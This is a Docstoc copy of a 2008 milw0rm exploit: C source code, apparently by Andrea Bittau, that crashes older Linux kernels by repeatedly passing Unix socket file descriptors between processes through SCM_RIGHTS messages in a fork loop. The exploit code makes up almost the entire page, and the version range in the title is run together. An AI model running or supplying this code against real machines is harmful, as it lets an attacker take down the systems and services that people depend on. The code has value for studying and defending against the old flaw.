Docstoc

Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit

Document Sample
Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit Powered By Docstoc
					                     Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit   Page 1/3
   1   #include     <sys/socket.h>
   2   #include     <sys/un.h>
   3   #include     <unistd.h>
   4   #include     <assert.h>
   5   #include     <err.h>
   6   #include     <stdlib.h>
   7
   8   static int own_child(int *us)
   9   {
  10           int pid;
  11           int s[2];
  12           struct msghdr mh;
  13           char crap[1024];
  14           struct iovec iov;
  15           struct cmsghdr *c;
  16           int *fd;
  17           int rc;
  18
  19            pid = fork();
  20            if (pid == −1)
  21                    err(1, "fork()");
  22
  23            if (pid) {
  24                  close(us[1]);
  25
  26                      return pid;
  27            }
  28
  29            close(us[0]);
  30
  31            memset(&mh, 0, sizeof(mh));
  32            iov.iov_base = "a";
  33            iov.iov_len = 1;
  34
  35            mh.msg_iov           =   &iov;
  36            mh.msg_iovlen        =   1;
  37            mh.msg_control       =   crap;
  38            mh.msg_controllen    =   sizeof(crap);
  39
  40            c = CMSG_FIRSTHDR(&mh);
  41            assert(c);
  42
  43            c−>cmsg_level = SOL_SOCKET;
  44            c−>cmsg_type = SCM_RIGHTS;
  45
  46            fd = (int*) CMSG_DATA(c);
  47            assert(fd);
  48
  49            c−>cmsg_len = CMSG_LEN(sizeof(int));
  50            mh.msg_controllen = c−>cmsg_len;
  51
  52            while (1) {
Andrea Bittau                                                                                11/11/2008
                    Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit   Page 2/3
  53                    if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == −1)
  54                            err(1, "socketpair()");
  55
  56                    *fd = s[0];
  57
  58                    rc = sendmsg(us[1], &mh, 0);
  59                    if (rc == −1)
  60                            err(1, "sendmsg()");
  61
  62                    if (rc != iov.iov_len)
  63                            errx(1, "sent short");
  64
  65                    close(s[0]);
  66                    close(us[1]);
  67                    us[1] = s[1];
  68            }
  69    }
  70
  71    static void own(void)
  72    {
  73            static int pid;
  74            static int us[2];
  75            char crap[1024];
  76            char morte[1024];
  77            struct cmsghdr *c;
  78            int rc;
  79            struct msghdr mh;
  80            struct iovec iov;
  81            int *fds;
  82
  83            if (!pid) {
  84                    if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == −1)
  85                            err(1, "socketpair()");
  86                    pid = own_child(us);
  87            }
  88
  89            iov.iov_base = morte;
  90            iov.iov_len = sizeof(morte);
  91
  92            memset(&mh, 0, sizeof(mh));
  93            mh.msg_iov        = &iov;
  94            mh.msg_iovlen     = 1;
  95            mh.msg_control    = crap;
  96            mh.msg_controllen = sizeof(crap);
  97
  98            rc = recvmsg(us[0], &mh, 0);
  99            if (rc == −1)
  100                   err(1, "recvmsg()");
  101
  102           if (rc == 0)
  103                   errx(1, "EOF");
  104

Andrea Bittau                                                                               11/11/2008
                  Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit   Page 3/3
  105           c = CMSG_FIRSTHDR(&mh);
  106           assert(c);
  107           assert(c−>cmsg_type == SCM_RIGHTS);
  108
  109           fds = (int*) CMSG_DATA(c);
  110           assert(fds);
  111
  112           close(us[0]);
  113           us[0] = *fds;
  114   }
  115
  116   int main(int argc, char *argv[])
  117   {
  118           own();
  119           exit(0);
  120   }
  121
  122   // milw0rm.com [2008−11−11]




Andrea Bittau                                                                             11/11/2008

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:21357
posted:5/24/2010
language:English
pages:3